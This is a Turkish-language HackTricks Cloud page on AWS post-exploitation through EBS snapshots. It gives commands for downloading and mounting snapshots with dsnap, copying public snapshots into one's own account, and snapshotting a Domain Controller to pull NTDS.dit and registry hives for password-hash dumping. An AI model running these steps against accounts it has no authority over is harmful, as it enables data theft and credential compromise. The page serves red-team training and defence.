AWS - EBS Snapshot Dump

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

Bir snapshot'ı yerel olarak kontrol etme

# Install dependencies
pip install 'dsnap[cli]'
brew install vagrant
brew install virtualbox

# Get snapshot from image
mkdir snap_wordir; cd snap_workdir
dsnap init
## Download a snapshot of the volume of that instance
## If no snapshot existed it will try to create one
dsnap get <instance-id>
dsnap --profile default --region eu-west-1 get i-0d706e33814c1ef9a
## Other way to get a snapshot
dsnap list #List snapshots
dsnap get snap-0dbb0347f47e38b96 #Download snapshot directly

# Run with vagrant
IMAGE="<download_file>.img" vagrant up #Run image with vagrant+virtuabox
IMAGE="<download_file>.img" vagrant ssh #Access the VM
vagrant destroy #To destoy

# Run with docker
git clone https://github.com/RhinoSecurityLabs/dsnap.git
cd dsnap
make docker/build
IMAGE="<download_file>.img" make docker/run #With the snapshot downloaded

Not dsnap kamu anlık görüntülerini indirmenize izin vermez. Bunu aşmak için, anlık görüntüyü kişisel hesabınıza kopyalayabilir ve onu indirebilirsiniz:

# Copy the snapshot
aws ec2 copy-snapshot --source-region us-east-2 --source-snapshot-id snap-09cf5d9801f231c57 --destination-region us-east-2 --description "copy of snap-09cf5d9801f231c57"

# View the snapshot info
aws ec2 describe-snapshots --owner-ids self --region us-east-2

# Download the snapshot. The ID is the copy from your account
dsnap --region us-east-2 get snap-027da41be451109da

# Delete the snapshot after downloading
aws ec2 delete-snapshot --snapshot-id snap-027da41be451109da --region us-east-2

Bu teknik hakkında daha fazla bilgi için orijinal araştırmayı https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/ adresinden kontrol edebilirsiniz.

Bunu Pacu ile ebs__download_snapshots modülünü kullanarak yapabilirsiniz.

AWS'de bir anlık görüntüyü kontrol etme

aws ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id snap-0b49342abd1bdcb89

Kontrolünüz altındaki bir EC2 VM'ye bağlayın (yedek kopyanın bulunduğu bölgeyle aynı bölgede olmalıdır):

Adım 1: EC2 –> Volumes bölümüne giderek tercih ettiğiniz boyut ve türde yeni bir hacim oluşturulmalıdır.

Bu işlemi gerçekleştirebilmek için şu komutları izleyin:

EC2 örneğine eklemek için bir EBS hacmi oluşturun.
EBS hacminin ve örneğin aynı bölgede olduğundan emin olun.

Adım 2: Oluşturulan hacme sağ tıklayarak "attach volume" seçeneği seçilmelidir.

Adım 3: Örnek metin kutusundan örnek seçilmelidir.

Bu işlemi gerçekleştirebilmek için aşağıdaki komutu kullanın:

EBS hacmini ekleyin.

Adım 4: EC2 örneğine giriş yapın ve lsblk komutunu kullanarak mevcut diskleri listeleyin.

Adım 5: Hacmin herhangi bir verisi olup olmadığını kontrol etmek için sudo file -s /dev/xvdf komutunu kullanın.

Yukarıdaki komutun çıktısı "/dev/xvdf: data" gösteriyorsa, hacim boştur.

Adım 6: Hacmi ext4 dosya sistemine formatlamak için sudo mkfs -t ext4 /dev/xvdf komutunu kullanın. Alternatif olarak, sudo mkfs -t xfs /dev/xvdf komutunu kullanarak xfs formatını da kullanabilirsiniz. Lütfen ya ext4 ya da xfs kullanmanız gerektiğini unutmayın.

Adım 7: Yeni ext4 hacmini bağlamak için istediğiniz bir dizin oluşturun. Örneğin, "newvolume" adını kullanabilirsiniz.

Bu işlemi gerçekleştirebilmek için sudo mkdir /newvolume komutunu kullanın.

Adım 8: Hacmi "newvolume" dizinine bağlamak için sudo mount /dev/xvdf /newvolume/ komutunu kullanın.

Adım 9: "newvolume" dizinine geçin ve hacim bağlamasını doğrulamak için disk alanını kontrol edin.

Bu işlemi gerçekleştirebilmek için şu komutları kullanın:

/newvolume dizinine geçin.
Disk alanını kontrol etmek için df -h . komutunu kullanın. Bu komutun çıktısı "newvolume" dizinindeki boş alanı göstermelidir.

Bunu Pacu ile ebs__explore_snapshots modülünü kullanarak yapabilirsiniz.

AWS'de bir anlık görüntüyü kontrol etme (cli kullanarak)

aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id <snap-0b49342abd1bdcb89>

# Attach new volume to instance
aws ec2 attach-volume --device /dev/sdh --instance-id <INSTANCE-ID> --volume-id <VOLUME-ID>

# mount the snapshot from within the VM

sudo file -s /dev/sdh
/dev/sdh: symbolic link to `xvdh'

sudo file -s /dev/xvdh
/dev/xvdh: x86 boot sector; partition 1: ID=0xee, starthead 0, startsector 1, 16777215 sectors, extended partition table (last)\011, code offset 0x63

lsblk /dev/xvdh
NAME     MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
xvdh     202:112  0    8G  0 disk
├─xvdh1  202:113  0  7.9G  0 part
├─xvdh14 202:126  0    4M  0 part
└─xvdh15 202:127  0  106M  0 part

sudo mount /dev/xvdh1 /mnt

ls /mnt

Gölge Kopyası

EC2:CreateSnapshot iznine sahip herhangi bir AWS kullanıcısı, Domain Controller'ın bir anlık görüntüsünü oluşturarak ve bunu kontrol ettikleri bir örneğe monte ederek tüm alan kullanıcılarının hash'lerini çalabilir ve NTDS.dit ve SYSTEM kayıt defteri hibe dosyasını Impacket'in secretsdump projesi ile kullanmak üzere dışa aktarabilir.

Bu aracı saldırıyı otomatikleştirmek için kullanabilirsiniz: https://github.com/Static-Flow/CloudCopy veya bir anlık görüntü oluşturduktan sonra önceki tekniklerden birini kullanabilirsiniz.

Referanslar

https://devopscube.com/mount-ebs-volume-ec2-instance/

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live bizi takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousAWS - EC2, EBS, SSM & VPC Post Exploitation NextAWS - Malicious VPC Mirror

Last updated 3 days ago